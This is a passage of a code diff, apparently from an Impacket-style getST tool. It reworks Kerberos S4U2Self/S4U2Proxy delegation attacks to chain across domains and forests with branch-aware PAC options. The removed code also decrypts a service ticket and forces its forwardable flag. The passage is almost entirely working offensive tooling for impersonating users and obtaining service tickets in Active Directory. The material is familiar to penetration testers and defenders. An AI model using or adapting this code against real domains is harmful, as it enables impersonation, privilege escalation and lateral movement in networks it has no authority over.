-        paForUserEnc['cksum']['cksumtype'] = int(constants.ChecksumTypes.hmac_md5.value)
-        paForUserEnc['cksum']['checksum'] = checkSum
-        paForUserEnc['auth-package'] = 'Kerberos'
-
-        encodedPaForUserEnc = encoder.encode(paForUserEnc)
-        padatatype = int(constants.PreAuthenticationDataTypes.PA_FOR_USER.value)
-        paencoded = encodedPaForUserEnc
-
-        tgsReq['padata'][1] = noValue
-        tgsReq['padata'][1]['padata-type'] = padatatype
-        tgsReq['padata'][1]['padata-value'] = paencoded
-
-        message = encoder.encode(tgsReq)
-
-        r = sendReceive(message, targetDomain, kdcHost)
-        tgs = decoder.decode(r, asn1Spec=TGS_REP())[0]
-        cipherText = tgs['enc-part']['cipher']
-        plainText = cipher.decrypt(sessionKey, 8, cipherText)
-        encTGSRepPart = decoder.decode(plainText, asn1Spec = EncTGSRepPart())[0]
-        newSessionKey = Key(encTGSRepPart['key']['keytype'], encTGSRepPart['key']['keyvalue'].asOctets())
-
-        return r, sessionKey, newSessionKey
-    
-
-    def doS4UProxyCrossDomain(self, ticket, decodedTGT, additionalTicket, cipher, sessionKey, kdcHost, targetDomain, crossForest):
-        apReq = AP_REQ()
-        apReq['pvno'] = 5
-        apReq['msg-type'] = int(constants.ApplicationTagNumbers.AP_REQ.value)
-
-        opts = list()
-        apReq['ap-options'] =  constants.encodeFlags(opts)
-        seq_set(apReq,'ticket', ticket.to_asn1)
-
-        authenticator = Authenticator()
-        authenticator['authenticator-vno'] = 5
-        authenticator['crealm'] = decodedTGT['crealm'].asOctets()
-
-        clientName = Principal()
-        clientName.from_asn1( decodedTGT, 'crealm', 'cname')
-
-        seq_set(authenticator, 'cname', clientName.components_to_asn1)
-
-        now = datetime.datetime.now(datetime.timezone.utc)
-        authenticator['cusec'] =  now.microsecond
-        authenticator['ctime'] = KerberosTime.to_asn1(now)
-
-        encodedAuthenticator = encoder.encode(authenticator)
-        encryptedEncodedAuthenticator = cipher.encrypt(sessionKey, 7, encodedAuthenticator, None)
-
-        apReq['authenticator'] = noValue
-        apReq['authenticator']['etype'] = cipher.enctype
-        apReq['authenticator']['cipher'] = encryptedEncodedAuthenticator
-
-        encodedApReq = encoder.encode(apReq)
-
-        tgsReq = TGS_REQ()
-        tgsReq['pvno'] =  5
-        tgsReq['msg-type'] = int(constants.ApplicationTagNumbers.TGS_REQ.value)
-        tgsReq['padata'] = noValue
-        tgsReq['padata'][0] = noValue
-        tgsReq['padata'][0]['padata-type'] = int(constants.PreAuthenticationDataTypes.PA_TGS_REQ.value)
-        tgsReq['padata'][0]['padata-value'] = encodedApReq
-
-        # Add resource-based constrained delegation support
+        # Add resource-based constrained delegation[+ branch-aware] support
         paPacOptions = PA_PAC_OPTIONS()
-        paPacOptions['flags'] = constants.encodeFlags((constants.PAPacOptions.resource_based_constrained_delegation.value,))
-        if crossForest:
-            paPacOptions['flags'] = constants.encodeFlags((constants.PAPacOptions.resource_based_constrained_delegation.value,constants.PAPacOptions.branch_aware.value))
-
-
-        tgsReq['padata'][1] = noValue
-        tgsReq['padata'][1]['padata-type'] = constants.PreAuthenticationDataTypes.PA_PAC_OPTIONS.value
-        tgsReq['padata'][1]['padata-value'] = encoder.encode(paPacOptions)
-        
-
-        reqBody = seq_set(tgsReq, 'req-body')
-
-        if not(crossForest):
-            seq_set_iter(reqBody, 'additional-tickets', (additionalTicket,))
-
-        opts = list()
-        # This specified we're doing S4U
-        if not(crossForest):
-            opts.append(constants.KDCOptions.cname_in_addl_tkt.value)
-        opts.append(constants.KDCOptions.canonicalize.value)
-        opts.append(constants.KDCOptions.forwardable.value)
-        opts.append(constants.KDCOptions.renewable.value)
-
-        reqBody['kdc-options'] = constants.encodeFlags(opts)
-        serverName = Principal(self.__options.spn, type=constants.PrincipalNameType.NT_SRV_INST.value)
-        seq_set(reqBody, 'sname', serverName.components_to_asn1)
-        reqBody['realm'] = str(targetDomain)
-
-        now = datetime.datetime.now(datetime.timezone.utc) + datetime.timedelta(days=1)
-
-        reqBody['till'] = KerberosTime.to_asn1(now)
-        reqBody['nonce'] = random.getrandbits(31)
-        seq_set_iter(reqBody, 'etype',
-                        (
-                            int(constants.EncryptionTypes.rc4_hmac.value),
-                            int(constants.EncryptionTypes.rc4_hmac_exp.value),
-                            int(constants.EncryptionTypes.aes128_cts_hmac_sha1_96.value),
-                            int(constants.EncryptionTypes.aes256_cts_hmac_sha1_96.value),
-                            int(cipher.enctype)
-                        )
-                    )
-        message = encoder.encode(tgsReq)
-
-        logging.info('Requesting S4U2Proxy')
-        r = sendReceive(message, targetDomain, kdcHost)
-        tgs = decoder.decode(r, asn1Spec=TGS_REP())[0]
-        cipherText = tgs['enc-part']['cipher']
-        plainText = cipher.decrypt(sessionKey, 8, cipherText)
-        encTGSRepPart = decoder.decode(plainText, asn1Spec = EncTGSRepPart())[0]
-        newSessionKey = Key(encTGSRepPart['key']['keytype'], encTGSRepPart['key']['keyvalue'].asOctets())
-
-
-        return r, sessionKey, newSessionKey
-    
-    
-    def doRBCDCrossForest(self, ticket, decodedTGT, additionalTicket, cipher, sessionKey, kdcHost, targetDomain):
-        apReq = AP_REQ()
-        new_cipher = crypto._RC4
-
-        apReq['pvno'] = 5
-        apReq['msg-type'] = int(constants.ApplicationTagNumbers.AP_REQ.value)
-
-        opts = list()
-        apReq['ap-options'] =  constants.encodeFlags(opts)
-        seq_set(apReq,'ticket', ticket.to_asn1)
-
-        authenticator = Authenticator()
-        authenticator['authenticator-vno'] = 5
-        authenticator['crealm'] = decodedTGT['crealm'].asOctets()
-
-        clientName = Principal()
-        clientName.from_asn1( decodedTGT, 'crealm', 'cname')
-
-        seq_set(authenticator, 'cname', clientName.components_to_asn1)
-
-        now = datetime.datetime.now(datetime.timezone.utc)
-        authenticator['cusec'] =  now.microsecond
-        authenticator['ctime'] = KerberosTime.to_asn1(now)
-
-        encodedAuthenticator = encoder.encode(authenticator)
-        encryptedEncodedAuthenticator = new_cipher.encrypt(sessionKey, 7, encodedAuthenticator, None)
-
-        apReq['authenticator'] = noValue
-        apReq['authenticator']['etype'] = new_cipher.enctype
-        apReq['authenticator']['cipher'] = encryptedEncodedAuthenticator
-
-        encodedApReq = encoder.encode(apReq)
-
-        tgsReq = TGS_REQ()
-        tgsReq['pvno'] =  5
-        tgsReq['msg-type'] = int(constants.ApplicationTagNumbers.TGS_REQ.value)
-        tgsReq['padata'] = noValue
-        tgsReq['padata'][0] = noValue
-        tgsReq['padata'][0]['padata-type'] = int(constants.PreAuthenticationDataTypes.PA_TGS_REQ.value)
-        tgsReq['padata'][0]['padata-value'] = encodedApReq
-
-        # Add resource-based constrained delegation support
-        paPacOptions = PA_PAC_OPTIONS()
-        paPacOptions['flags'] = constants.encodeFlags((constants.PAPacOptions.resource_based_constrained_delegation.value,))
-
-        tgsReq['padata'][1] = noValue
-        tgsReq['padata'][1]['padata-type'] = constants.PreAuthenticationDataTypes.PA_PAC_OPTIONS.value
-        tgsReq['padata'][1]['padata-value'] = encoder.encode(paPacOptions)
-
-        reqBody = seq_set(tgsReq, 'req-body')
-
-        opts = list()
-        opts.append(constants.KDCOptions.canonicalize.value)
-        opts.append(constants.KDCOptions.forwardable.value)
-        opts.append(constants.KDCOptions.renewable.value)
-        opts.append(constants.KDCOptions.cname_in_addl_tkt.value)
-
-        reqBody['kdc-options'] = constants.encodeFlags(opts)
-        serverName = Principal(self.__options.spn, type=constants.PrincipalNameType.NT_SRV_INST.value)
-        seq_set(reqBody, 'sname', serverName.components_to_asn1)
-        reqBody['realm'] = str(targetDomain)
-
-        seq_set_iter(reqBody, 'additional-tickets', (additionalTicket,))
-
-        now = datetime.datetime.now(datetime.timezone.utc) + datetime.timedelta(days=1)
-
-        reqBody['till'] = KerberosTime.to_asn1(now)
-        reqBody['nonce'] = random.getrandbits(31)
-        seq_set_iter(reqBody, 'etype',
-                        (
-                            int(constants.EncryptionTypes.rc4_hmac.value),
-                            int(constants.EncryptionTypes.rc4_hmac_exp.value),
-                            int(constants.EncryptionTypes.aes128_cts_hmac_sha1_96.value),
-                            int(constants.EncryptionTypes.aes256_cts_hmac_sha1_96.value),
-                            int(new_cipher.enctype)
-                        )
-                    )
-        message = encoder.encode(tgsReq)
-
-        logging.info('Requesting TGS')
-        r = sendReceive(message, targetDomain, kdcHost)
-
-        return r
-
-    def doS4UCrossForest(self, tgt, cipher, oldSessionKey, sessionKey, nthash, aesKey, kdcHost, otherDcHost, otherDomain):
-        decodedTGT = decoder.decode(tgt, asn1Spec=AS_REP())[0]
-        # Extract the ticket from the TGT
-        ticket = Ticket()
-        ticket.from_asn1(decodedTGT['ticket'])
-
-        logging.debug("Trying step S4U2SELF for domain:" + self.__domain.upper())
-
-        targetDomain = self.__domain.upper()
-        r, TGT_sessionKey, newSessionKey = self.doS4U2SelfCrossDomain(ticket, decodedTGT, cipher, sessionKey, kdcHost, targetDomain, True)
-
-        logging.debug("S4U2Self - OK")
-
-        domain = self.__domain.upper()
-
-        tgs = decoder.decode(r, asn1Spec=TGS_REP())[0]
-
-        if logging.getLogger().level == logging.DEBUG:
-            logging.debug('TGS_REP')
-            print(tgs.prettyPrint())
-        
-        sessionKey = TGT_sessionKey
-        
-        # We use the cross-domain TGT in the authenticator
-        ticket = Ticket()
-        ticket.from_asn1(decodedTGT['ticket'])
-
-       # But we include our S4U2SELF service ticket as an additional ticket
-        add_ticket = Ticket()
-        add_ticket.from_asn1(tgs['ticket'])
-        myTicket = add_ticket.to_asn1(TicketAsn1())
-
-        r, _, _ = self.doS4UProxyCrossDomain(ticket, decodedTGT, myTicket, cipher, sessionKey, kdcHost, domain, False)
-
-        logging.debug("Second step S4U2Proxy - OK")
-
-        tgs = decoder.decode(r, asn1Spec=TGS_REP())[0]
-        lastticket = Ticket()
-        lastticket.from_asn1(tgs['ticket'])
-        last = lastticket.to_asn1(TicketAsn1())
-
-        if logging.getLogger().level == logging.DEBUG:
-            logging.debug('TGS_REP')
-            print(tgs.prettyPrint())
-
-        r, _, newSessionKeyTGS = self.doS4UProxyCrossDomain(ticket, decodedTGT, myTicket, cipher, sessionKey, kdcHost, domain, True)
-        logging.debug("Third step OK : S4U2Proxy crossforest")
-
-        tgs = decoder.decode(r, asn1Spec=TGS_REP())[0]
-        # Extract the ticket from the TGS
-        ticket = Ticket()
-        ticket.from_asn1(tgs['ticket'])
-        logging.debug("Fourth step TGS crossforest - OK")
-
-        r = self.doRBCDCrossForest(ticket, decodedTGT, last, cipher, newSessionKeyTGS, otherDcHost, otherDomain)
-
-        return r, None, newSessionKeyTGS, None
-    
-
-    def doS4UCrossDomain(self, tgt, cipher, oldSessionKey, sessionKey, nthash, aesKey, kdcHost, otherDcHost):
-        init_cipher = cipher
-        init_session_key = sessionKey
-        logging.debug("Asking for cross-domain TGT")
-        target = ("krbtgt/%s@%s" % (self.__targetDomain, self.__domain))
-        serverName = Principal(target, type=constants.PrincipalNameType.NT_SRV_INST.value)
-        cross_domtgt, cipher, oldSessionKey, sessionKey = getKerberosTGS(serverName, self.__domain, kdcHost, tgt, cipher, sessionKey, self.__options.renew)
-        crossdom_cipher = cipher
-        logging.debug("Cross-domain TGT - OK")
-
-        try: 
-            decodedTGT = decoder.decode(cross_domtgt, asn1Spec=AS_REP())[0]
-        except:
-            decodedTGT = decoder.decode(cross_domtgt, asn1Spec = TGS_REP())[0]
-
-        # Extract the ticket from the cross-domain TGT
-        ticket = Ticket()
-        ticket.from_asn1(decodedTGT['ticket'])
-
-        targetDomain = self.__targetDomain.upper()
-        r, TGT_sessionKey, newSessionKey = self.doS4U2SelfCrossDomain(ticket, decodedTGT, cipher, sessionKey, otherDcHost, targetDomain, False)
-
-        logging.debug("Referral S4U2Self - OK")
-
-        tgs = decoder.decode(r, asn1Spec=TGS_REP())[0]
-
-        sessionKey = newSessionKey
-        
-        # Extract the ticket from the response
-        ticket = Ticket()
-        ticket.from_asn1(tgs['ticket'])
-        
-        # We do not need to store the sessionKey, as we will only use the initial TGT and the cross-domain TGT in the authenticator 
-        r, _, _ = self.doS4U2SelfCrossDomain(ticket, decodedTGT, cipher, sessionKey, kdcHost, str(decodedTGT['crealm']).upper(), False)
-
-        tgs = decoder.decode(r, asn1Spec=TGS_REP())[0]
-
-        logging.debug("S4U2Self - OK")
-
-        if logging.getLogger().level == logging.DEBUG:
-            logging.debug('TGS_REP')
-            print(tgs.prettyPrint())
-            
-                                                                        
-        ### Now we have the second ticket : S4U2Self effective ticket
-        # We still have to perform the S4U2Proxy 
-        sessionKey = TGT_sessionKey
-        
-        # We use the initial TGT in the authenticator
-       # But we include our S4U2SELF service ticket  as an additional ticket
-        add_ticket = Ticket()
-        add_ticket.from_asn1(tgs['ticket'])
-        myTicket = add_ticket.to_asn1(TicketAsn1())
-
-        initial_tgt = decoder.decode(tgt, asn1Spec=AS_REP())[0]
-        ticket = Ticket()
-        ticket.from_asn1(initial_tgt['ticket'])
-
-        r, _, _ = self.doS4UProxyCrossDomain(ticket, initial_tgt, myTicket, init_cipher, init_session_key, kdcHost, str(decodedTGT['crealm']).upper(), False)
-
-        logging.debug("Referral S4U2Proxy - OK")
-        tgs = decoder.decode(r, asn1Spec=TGS_REP())[0]
-        if logging.getLogger().level == logging.DEBUG:
-            logging.debug('TGS_REP')
-            print(tgs.prettyPrint())
-        add_ticket = Ticket()
-        add_ticket.from_asn1(tgs['ticket'])
-
-        myTicket = add_ticket.to_asn1(TicketAsn1())
-        
-        ticket = Ticket()
-        ticket.from_asn1(decodedTGT['ticket'])
-
-        r, oldsess , newsess = self.doS4UProxyCrossDomain(ticket, decodedTGT, myTicket, crossdom_cipher, sessionKey, otherDcHost, self.__targetDomain, False)
-        logging.debug("S4U2Proxy - OK")
-
-        return r, None, oldsess, None
-    
-    def doS4U2ProxyWithAdditionalTicket(self, tgt, cipher, oldSessionKey, sessionKey, nthash, aesKey, kdcHost, additional_ticket_path):
-        if not os.path.isfile(additional_ticket_path):
-            logging.error("Ticket %s doesn't exist" % additional_ticket_path)
-            exit(0)
+        if branchAware:
+            paPacOptions['flags'] = constants.encodeFlags((constants.PAPacOptions.resource_based_constrained_delegation.value,
+                                                           constants.PAPacOptions.branch_aware.value))
         else:
-            decodedTGT = decoder.decode(tgt, asn1Spec=AS_REP())[0]
-            logging.info("\tUsing additional ticket %s instead of S4U2Self" % additional_ticket_path)
-            ccache = CCache.loadFile(additional_ticket_path)
-            principal = ccache.credentials[0].header['server'].prettyPrint()
-            creds = ccache.getCredential(principal.decode())
-            TGS = creds.toTGS(principal)
-
-            tgs = decoder.decode(TGS['KDC_REP'], asn1Spec=TGS_REP())[0]
-
-            if logging.getLogger().level == logging.DEBUG:
-                logging.debug('TGS_REP')
-                print(tgs.prettyPrint())
-
-            if self.__force_forwardable:
-                # Convert hashes to binary form, just in case we're receiving strings
-                if isinstance(nthash, str):
-                    try:
-                        nthash = unhexlify(nthash)
-                    except TypeError:
-                        pass
-                if isinstance(aesKey, str):
-                    try:
-                        aesKey = unhexlify(aesKey)
-                    except TypeError:
-                        pass
-
-                # Compute NTHash and AESKey if they're not provided in arguments
-                if self.__password != '' and self.__domain != '' and self.__user != '':
-                    if not nthash:
-                        nthash = compute_nthash(self.__password)
-                        if logging.getLogger().level == logging.DEBUG:
-                            logging.debug('NTHash')
-                            print(hexlify(nthash).decode())
-                    if not aesKey:
-                        salt = self.__domain.upper() + self.__user
-                        aesKey = _AES256CTS.string_to_key(self.__password, salt, params=None).contents
-                        if logging.getLogger().level == logging.DEBUG:
-                            logging.debug('AESKey')
-                            print(hexlify(aesKey).decode())
-
-                # Get the encrypted ticket returned in the TGS. It's encrypted with one of our keys
-                cipherText = tgs['ticket']['enc-part']['cipher']
-
-                # Check which cipher was used to encrypt the ticket. It's not always the same
-                # This determines which of our keys we should use for decryption/re-encryption
-                newCipher = _enctype_table[int(tgs['ticket']['enc-part']['etype'])]
-                if newCipher.enctype == Enctype.RC4:
-                    key = Key(newCipher.enctype, nthash)
-                else:
-                    key = Key(newCipher.enctype, aesKey)
-
-                # Decrypt and decode the ticket
-                # Key Usage 2
-                # AS-REP Ticket and TGS-REP Ticket (includes tgs session key or
-                #  application session key), encrypted with the service key
-                #  (section 5.4.2)
-                plainText = newCipher.decrypt(key, 2, cipherText)
-                encTicketPart = decoder.decode(plainText, asn1Spec=EncTicketPart())[0]
-
-                # Print the flags in the ticket before modification
-                logging.debug('\tService ticket from S4U2self flags: ' + str(encTicketPart['flags']))
-                logging.debug('\tService ticket from S4U2self is'
-                              + ('' if (encTicketPart['flags'][TicketFlags.forwardable.value] == 1) else ' not')
-                              + ' forwardable')
-
-                # Customize flags the forwardable flag is the only one that really matters
-                logging.info('\tForcing the service ticket to be forwardable')
-                # convert to string of bits
-                flagBits = encTicketPart['flags'].asBinary()
-                # Set the forwardable flag. Awkward binary string insertion
-                flagBits = flagBits[:TicketFlags.forwardable.value] + '1' + flagBits[TicketFlags.forwardable.value + 1:]
-                # Overwrite the value with the new bits
-                encTicketPart['flags'] = encTicketPart['flags'].clone(value=flagBits)  # Update flags
-
-                logging.debug('\tService ticket flags after modification: ' + str(encTicketPart['flags']))
-                logging.debug('\tService ticket now is'
-                              + ('' if (encTicketPart['flags'][TicketFlags.forwardable.value] == 1) else ' not')
-                              + ' forwardable')
-
-                # Re-encode and re-encrypt the ticket
-                # Again, Key Usage 2
-                encodedEncTicketPart = encoder.encode(encTicketPart)
-                cipherText = newCipher.encrypt(key, 2, encodedEncTicketPart, None)
-
-                # put it back in the TGS
-                tgs['ticket']['enc-part']['cipher'] = cipherText
-
-            ################################################################################
-            # Up until here was all the S4USelf stuff. Now let's start with S4U2Proxy
-            # So here I have a ST for me.. I now want a ST for another service
-            # Extract the ticket from the TGT
-            ticketTGT = Ticket()
-            ticketTGT.from_asn1(decodedTGT['ticket'])
-
-            # Get the service ticket
-            ticket = Ticket()
-            ticket.from_asn1(tgs['ticket'])
-
-            apReq = AP_REQ()
-            apReq['pvno'] = 5
-            apReq['msg-type'] = int(constants.ApplicationTagNumbers.AP_REQ.value)
-
-            opts = list()
-            apReq['ap-options'] = constants.encodeFlags(opts)
-            seq_set(apReq, 'ticket', ticketTGT.to_asn1)
-
-            authenticator = Authenticator()
-            authenticator['authenticator-vno'] = 5
-            authenticator['crealm'] = str(decodedTGT['crealm'])
-
-            clientName = Principal()
-            clientName.from_asn1(decodedTGT, 'crealm', 'cname')
-
-            seq_set(authenticator, 'cname', clientName.components_to_asn1)
-
-            now = datetime.datetime.now(datetime.timezone.utc)
-            authenticator['cusec'] = now.microsecond
-            authenticator['ctime'] = KerberosTime.to_asn1(now)
-
-            encodedAuthenticator = encoder.encode(authenticator)
-
-            # Key Usage 7
-            # TGS-REQ PA-TGS-REQ padata AP-REQ Authenticator (includes
-            # TGS authenticator subkey), encrypted with the TGS session
-            # key (Section 5.5.1)
-            encryptedEncodedAuthenticator = cipher.encrypt(sessionKey, 7, encodedAuthenticator, None)
-
-            apReq['authenticator'] = noValue
-            apReq['authenticator']['etype'] = cipher.enctype
-            apReq['authenticator']['cipher'] = encryptedEncodedAuthenticator
-
-            encodedApReq = encoder.encode(apReq)
-
-            tgsReq = TGS_REQ()
-
-            tgsReq['pvno'] = 5
-            tgsReq['msg-type'] = int(constants.ApplicationTagNumbers.TGS_REQ.value)
-            tgsReq['padata'] = noValue
-            tgsReq['padata'][0] = noValue
-            tgsReq['padata'][0]['padata-type'] = int(constants.PreAuthenticationDataTypes.PA_TGS_REQ.value)
-            tgsReq['padata'][0]['padata-value'] = encodedApReq
-
-            # Add resource-based constrained delegation support
-            paPacOptions = PA_PAC_OPTIONS()
             paPacOptions['flags'] = constants.encodeFlags((constants.PAPacOptions.resource_based_constrained_delegation.value,))
 
-            tgsReq['padata'][1] = noValue
-            tgsReq['padata'][1]['padata-type'] = constants.PreAuthenticationDataTypes.PA_PAC_OPTIONS.value
-            tgsReq['padata'][1]['padata-value'] = encoder.encode(paPacOptions)
+        tgsReq['padata'][1] = noValue
+        tgsReq['padata'][1]['padata-type'] = constants.PreAuthenticationDataTypes.PA_PAC_OPTIONS.value
+        tgsReq['padata'][1]['padata-value'] = encoder.encode(paPacOptions)
 
-            reqBody = seq_set(tgsReq, 'req-body')
+        reqBody = seq_set(tgsReq, 'req-body')
 
-            opts = list()
-            # This specified we're doing S4U
+        opts = list()
+        if additionalTicket != None and not branchAware:
             opts.append(constants.KDCOptions.cname_in_addl_tkt.value)
-            opts.append(constants.KDCOptions.canonicalize.value)
-            opts.append(constants.KDCOptions.forwardable.value)
-            opts.append(constants.KDCOptions.renewable.value)
+        # This specified we're doing S4U
+        opts.append(constants.KDCOptions.canonicalize.value)
+        opts.append(constants.KDCOptions.forwardable.value)
+        opts.append(constants.KDCOptions.renewable.value)
 
-            reqBody['kdc-options'] = constants.encodeFlags(opts)
-            service2 = Principal(self.__options.spn, type=constants.PrincipalNameType.NT_SRV_INST.value)
-            seq_set(reqBody, 'sname', service2.components_to_asn1)
-            reqBody['realm'] = self.__domain
+        reqBody['kdc-options'] = constants.encodeFlags(opts)
+        service2 = Principal(targetSPN, type=constants.PrincipalNameType.NT_SRV_INST.value)
+        seq_set(reqBody, 'sname', service2.components_to_asn1)
+        reqBody['realm'] = nextDomain
+        if additionalTicket != None and not branchAware:
+            seq_set_iter(reqBody, 'additional-tickets', (additionalTicket.to_asn1(TicketAsn1()),))
 
-            myTicket = ticket.to_asn1(TicketAsn1())
-            seq_set_iter(reqBody, 'additional-tickets', (myTicket,))
+        now = datetime.datetime.now(datetime.timezone.utc) + datetime.timedelta(days=1)
 
-            now = datetime.datetime.now(datetime.timezone.utc) + datetime.timedelta(days=1)
+        reqBody['till'] = KerberosTime.to_asn1(now)
+        reqBody['nonce'] = random.getrandbits(31)
+        seq_set_iter(reqBody, 'etype',
+                        (
+                            int(constants.EncryptionTypes.rc4_hmac.value),
+                            int(constants.EncryptionTypes.des3_cbc_sha1_kd.value),
+                            int(constants.EncryptionTypes.des_cbc_md5.value),
+                            int(cipher.enctype)
+                        )
+                        )
+        
+        if logging.getLogger().level == logging.DEBUG:
+            logging.debug('Final TGS')
+            print(tgsReq.prettyPrint())
 
-            reqBody['till'] = KerberosTime.to_asn1(now)
-            reqBody['nonce'] = random.getrandbits(31)
-            seq_set_iter(reqBody, 'etype',
-                         (
-                             int(constants.EncryptionTypes.rc4_hmac.value),
-                             int(constants.EncryptionTypes.des3_cbc_sha1_kd.value),
-                             int(constants.EncryptionTypes.des_cbc_md5.value),
-                             int(cipher.enctype)
-                         )
-                         )
-            message = encoder.encode(tgsReq)
+        message = encoder.encode(tgsReq)
 
-            logging.info('Requesting S4U2Proxy')
-            r = sendReceive(message, self.__domain, kdcHost)
-            return r, None, sessionKey, None
+        logging.info('Requesting S4U2Proxy%s to %s' % (' with branch-aware' if branchAware else '', nextKDC))
+        r = sendReceive(message, nextDomain, nextKDC)
 
-    def doS4U(self, tgt, cipher, oldSessionKey, sessionKey, nthash, aesKey, kdcHost):
-        decodedTGT = decoder.decode(tgt, asn1Spec=AS_REP())[0]
-        # Extract the ticket from the TGT
+        tgs = decoder.decode(r, asn1Spec=TGS_REP())[0]
+
+        if logging.getLogger().level == logging.DEBUG:
+            logging.debug('TGS_REP')
+            print(tgs.prettyPrint())
+
+        spn = Principal()
+        spn.from_asn1(tgs['ticket'], 'realm', 'sname')
+
+        # Parse TGS
+
+        cipherText = tgs['enc-part']['cipher']
+        # Key Usage 8
+        # TGS-REP encrypted part (includes application session
+        # key), encrypted with the TGS session key (Section 5.4.2)
+        plainText = cipher.decrypt(sessionKey, 8, cipherText)
+        encTGSRepPart = decoder.decode(plainText, asn1Spec = EncTGSRepPart())[0]
+        newSessionKey = Key(encTGSRepPart['key']['keytype'], encTGSRepPart['key']['keyvalue'].asOctets())
+        newCipher = _enctype_table[int(encTGSRepPart['key']['keytype'])]
+
+        # Check if we get the requested serviceName: If not this is for another KDC
+
+        if str(spn).split('@')[0].lower() == targetSPN.lower() or noRec:
+            return r, newCipher, sessionKey, newSessionKey
+        else:
+            if branchAware:
+                return r, newCipher, sessionKey, newSessionKey
+            
+            # It is not a S4U2Proxy+BranchAware request
+		    # Send subsequent requests
+
+            if forest:
+
+                prevDomain = nextDomain
+                nextDomain = spn.components[1].upper()
+                initialNextDomain = nextDomain
+                oneHop = True
+
+                # For next cross-realm domain inside another forest
+			    # Do S4U2Proxy+BranchAware first
+                
+                tgtBA, cipherBA, oldSessionKeyBA, newSessionKeyBA = self.doS4U2Proxy(tgt, cipher, sessionKey, targetSPN, None, True, True, prevDomain, nextKDC)
+                tgs = decoder.decode(tgtBA, asn1Spec=TGS_REP())[0]
+                if logging.getLogger().level == logging.DEBUG:
+                    logging.debug('TGS_REP')
+                    print(tgs.prettyPrint())
+
+                # Retrieve recursively ST use as TGT for final S4U2Proxy = last TGS-REQ/S4U2Proxy or first S4U2Proxy+BranchAware for targetSPN
+
+                while True:
+
+                    # 1: TGS-REQ with S4U2Proxy+BranchAware TGT then previous S4U2Proxy
+
+                    if nextDomain.lower() == self.__proxydomain.lower() and self.__proxydc is not None:
+                        nextKDC = self.__proxydc
+                    else:
+                        nextKDC = nextDomain
+
+                    logging.info(f'Requesting TGS-REQ for {targetSPN} to {nextKDC}')
+                    if oneHop:
+                        tgtNextDomain1, cipherNextDomain1, oldSessionKeyNextDomain1, newSessionKeyNextDomain1 = getKerberosTGS(Principal(targetSPN,
+                                                                        type = constants.PrincipalNameType.NT_SRV_INST.value),
+                                                                        nextDomain, nextKDC, tgtBA, cipherBA, newSessionKeyBA, noRec = True)
+                    else:
+                        tgtNextDomain1, cipherNextDomain1, oldSessionKeyNextDomain1, newSessionKeyNextDomain1 = getKerberosTGS(Principal(targetSPN,
+                                                                        type = constants.PrincipalNameType.NT_SRV_INST.value),
+                                                                        nextDomain, nextKDC, tgtNextDomain2, cipherNextDomain2,
+                                                                        newSessionKeyNextDomain2, noRec = True)
+
+                    tgs = decoder.decode(tgtNextDomain1, asn1Spec=TGS_REP())[0]
+                    if logging.getLogger().level == logging.DEBUG:
+                        logging.debug('TGS_REP')
+                        print(tgs.prettyPrint())
+                    spn = Principal()
+                    spn.from_asn1(tgs['ticket'], 'realm', 'sname')
+                    
+                    if str(spn).split('@')[0].lower() == targetSPN.lower():
+                        if oneHop:
+                            tgtPrev = tgtBA
+                            cipherPrev = cipherBA
+                            oldSessionKeyPrev = oldSessionKeyBA
+                            newSessionKeyPrev = newSessionKeyBA
+                        else:
+                            tgtPrev = tgtNextDomain2
+                            cipherPrev = cipherNextDomain2
+                            oldSessionKeyPrev = oldSessionKeyNextDomain2
+                            newSessionKeyPrev = newSessionKeyNextDomain2
+                        break
+                    else:
+                        prevDomain = nextDomain
+                        nextDomain = spn.components[1].upper()
+
+                    oneHop = False
+
+                    # 2: S4U2Proxy with previous TGT
+
+                    if nextDomain.lower() == self.__proxydomain.lower() and self.__proxydc is not None:
+                        nextKDC = self.__proxydc
+                    else:
+                        nextKDC = nextDomain
+
+                    tgtNextDomain2, cipherNextDomain2, oldSessionKeyNextDomain2, newSessionKeyNextDomain2 = self.doS4U2Proxy(tgtNextDomain1, cipherNextDomain1,
+                                                                                                            newSessionKeyNextDomain1, targetSPN, None, False,
+                                                                                                            True, nextDomain, nextKDC, noRec = True)
+                    
+                    tgs = decoder.decode(tgtNextDomain2, asn1Spec=TGS_REP())[0]
+                    if logging.getLogger().level == logging.DEBUG:
+                        logging.debug('TGS_REP')
+                        print(tgs.prettyPrint())
+                    spn = Principal()
+                    spn.from_asn1(tgs['ticket'], 'realm', 'sname')
+                    
+                    if str(spn).split('@')[0].lower() == targetSPN.lower():
+                        tgtPrev = tgtNextDomain1
+                        cipherPrev = cipherNextDomain1
+                        oldSessionKeyPrev = oldSessionKeyNextDomain1
+                        newSessionKeyPrev = newSessionKeyNextDomain1
+                        break
+                    else:
+                        prevDomain = nextDomain
+                        nextDomain = spn.components[1].upper()
+
+                # We have the ST as TGT for final S4U2Proxy
+                # Retrieve recursively the additional ticket for final S4U2Proxy = last S4U2Proxy for krbtgt/self.__proxydomain
+                # OR first S4U2Proxy for targetSPN with Additional Ticket = S4U2Self
+
+                if not oneHop:
+
+                    tgtAddTicket = r
+                    cipherAddTicket = newCipher
+                    newSessionKeyAddTicket = newSessionKey
+
+                    prevDomain = initialNextDomain
+
+                    while prevDomain.lower() != nextDomain.lower():
+
+                        if prevDomain.lower() == self.__proxydomain.lower() and self.__proxydc is not None:
+                            nextKDC = self.__proxydc
+                        else:
+                            nextKDC = prevDomain
+
+                        tgtAddTicket, cipherAddTicket, oldSessionKeyAddTicket, newSessionKeyAddTicket = self.doS4U2Proxy(tgtAddTicket, cipherAddTicket,
+                                                                            newSessionKeyAddTicket, f"krbtgt/{self.__proxydomain.upper()}",
+                                                                            None, False, True, prevDomain, nextKDC, noRec = True)
+                        
+                        tgs = decoder.decode(tgtAddTicket, asn1Spec=TGS_REP())[0]
+                        if logging.getLogger().level == logging.DEBUG:
+                            logging.debug('TGS_REP')
+                            print(tgs.prettyPrint())
+                        additionalTicket = Ticket()
+                        additionalTicket.from_asn1(tgs['ticket'])
+
+                        spn = Principal()
+                        spn.from_asn1(tgs['ticket'], 'realm', 'sname')
+                        prevDomain = spn.components[1].upper()
+                
+                else:
+
+                    tgs = decoder.decode(r, asn1Spec=TGS_REP())[0]
+                    additionalTicket = Ticket()
+                    additionalTicket.from_asn1(tgs['ticket'])
+                
+                # Send final S4U2Proxy to self.__proxydc/self.__proxydomain
+
+                if self.__proxydc is not None:
+                    nextKDC = self.__proxydc
+                else:
+                    nextKDC = self.__proxydomain.upper()
+                return self.doS4U2Proxy(tgtPrev, cipherPrev, newSessionKeyPrev,
